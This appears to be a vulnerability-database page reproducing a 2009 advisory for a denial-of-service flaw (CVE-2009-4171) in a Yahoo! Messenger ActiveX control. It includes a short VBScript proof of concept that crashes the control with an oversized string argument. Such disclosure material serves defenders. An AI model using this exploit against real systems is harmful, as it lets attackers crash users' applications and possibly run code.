Recent Vulnerabilities Product List Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2009-4171

Publish Date: 12 Nov 2009

                source: http://www.securityfocus.com/bid/37007/info

Yahoo! Messenger is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error.

A successful attack allows a remote attacker to crash the application using the ActiveX control (typically Internet Explorer), denying further service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.

Yahoo! Messenger 9.0.0.2162 is vulnerable; other versions may also be affected. 

&lt;?XML version='1.0' standalone='yes' ?&gt;

&lt;package&gt;&lt;job id='DoneInVBS' debug='false' error='true'&gt;

&lt;object classid='clsid:58916BE6-BAFF-4F33-AEFE-B2AA03FE4C86' id='target' /&gt;

&lt;script language='vbscript'&gt;


arg1=String(11284, "A")

target.RegisterMe arg1

&lt;/script&gt;

&lt;/job&gt;

&lt;/package&gt;

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Product List Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Yahoo! Messenger 9 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service

Vulmon Search

About

Products

Connect